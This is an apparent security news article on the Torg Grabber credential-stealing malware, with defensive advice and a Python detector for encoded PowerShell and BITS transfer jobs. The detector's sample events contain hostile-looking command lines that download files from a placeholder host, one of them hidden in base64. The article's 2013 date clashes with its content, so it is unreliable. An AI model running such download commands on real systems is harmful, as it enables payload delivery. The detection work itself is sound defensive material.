Torg Grabber is a new Malware-as-a-Service (MaaS) tool that steals credentials; this article examines it. It started as a simple way to steal data from Telegram and grew into a command-and-control (C2) infrastructure with a fully encrypted REST API.

The malware gets its name from one of its most popular C2 domains, technologytorg.com. "Torg" is a Russian word that means "trade" or "marketplace." The malware's appetite for data is very broad: it steals login information from 25 Chromium-based browsers and 8 Firefox-family browsers.

It also collects data from over 850 browser extensions, such as cryptocurrency wallets and two-factor authentication tools, and grabs session data from Discord, Telegram, and Steam. Before it starts collecting data, the malware looks for 46 antivirus signatures belonging to 24 different security products. Users should not download software from unofficial sources, game cheat sites, or cracked application platforms.

IT teams should watch for PowerShell commands launched with base64-encoded arguments and for BITS Transfer jobs that appear unexpectedly. Endpoint tools should be configured to flag patterns of direct syscall use and in-memory PE loading. Organizations that run Chromium-based browsers should verify that App-Bound Encryption is correctly configured.
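The two command-line indicators above (encoded PowerShell arguments and unexpected BITS transfer creation) can be checked directly in process-creation telemetry. The following is an added example written for this article, not code from the original page or from any vendor: it runs over a handful of constructed, simplified Sysmon-style process events (the event layout, PIDs and the `example.invalid` URL are all made up for the example), decodes the UTF-16LE base64 payload that `-EncodedCommand` carries, and flags BITS job creation both in the visible command line and inside the decoded payload. Direct syscall use and in-memory PE loading are memory-level behaviours that command-line logs cannot reveal, so they are not covered here.

```python
import base64
import re
from dataclasses import dataclass


def _encode_ps(script: str) -> str:
    """Build a PowerShell -EncodedCommand argument (base64 of UTF-16LE) for the sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation events (simplified Sysmon Event ID 1 shape).
# These are invented for the example and are not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -w hidden -enc " + _encode_ps(
         "Start-BitsTransfer -Source http://example.invalid/p.bin -Destination $env:TEMP\\p.bin")},
    {"pid": 4188, "parent": "cmd.exe", "image": "bitsadmin.exe",
     "cmdline": "bitsadmin.exe /transfer updjob /download /priority normal "
                "http://example.invalid/u.bin C:\\Users\\Public\\u.bin"},
    {"pid": 4200, "parent": "taskeng.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"pid": 4300, "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\Public\\notes.txt"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand: -e, -ec, -en, -enc, ...
# The base64 blob must be at least 16 characters to avoid matching short flags.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|e[cn]|enc[a-z]*)\s+([A-Za-z0-9+/=]{16,})")

# BITS job creation: the bitsadmin CLI verbs that create or add to a job, or the cmdlet.
BITS_PATTERNS = [
    re.compile(r"(?i)\bbitsadmin(?:\.exe)?\b.*?/(?:transfer|create|addfile)\b"),
    re.compile(r"(?i)\bStart-BitsTransfer\b"),
]


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Not valid base64/UTF-16LE: still worth a finding, but nothing to show.
        return None


def has_bits_job_creation(text: str) -> bool:
    return any(p.search(text) for p in BITS_PATTERNS)


def analyze_event(ev: dict) -> list:
    findings = []
    cmd = ev["cmdline"]
    decoded = decode_encoded_command(cmd)
    if ENC_FLAG.search(cmd):
        findings.append(Finding(ev["pid"], "powershell_encoded_args",
                                decoded if decoded is not None else "<undecodable base64>"))
    # Check the visible command line first, then the decoded payload, so a BITS
    # transfer hidden behind -EncodedCommand is still caught.
    for label, text in (("cmdline", cmd), ("decoded", decoded or "")):
        if has_bits_job_creation(text):
            findings.append(Finding(ev["pid"], "bits_transfer_job", f"{label}: {text[:80]}"))
            break
    return findings


def analyze_events(events: list) -> list:
    findings = []
    for ev in events:
        findings.extend(analyze_event(ev))
    return findings


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"pid={f.pid} rule={f.rule} detail={f.detail}")
```

Run as a script, it reports two findings for PID 4120 (encoded arguments, and a BITS job found only after decoding) and one for PID 4188, while the scheduled backup script and Notepad produce nothing. In production the same two checks would be expressed as EDR or SIEM rules over the real process-creation feed, with the decoded payload surfaced in the alert so analysts can triage without re-decoding by hand.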

Any time a browser process stops working unexpectedly while in use, treat it as a possible sign of a breach. The most recent version of this article came out on November 14, 2013, and the article was changed on November 17, 2013, to include the most recent news in the world of web security.
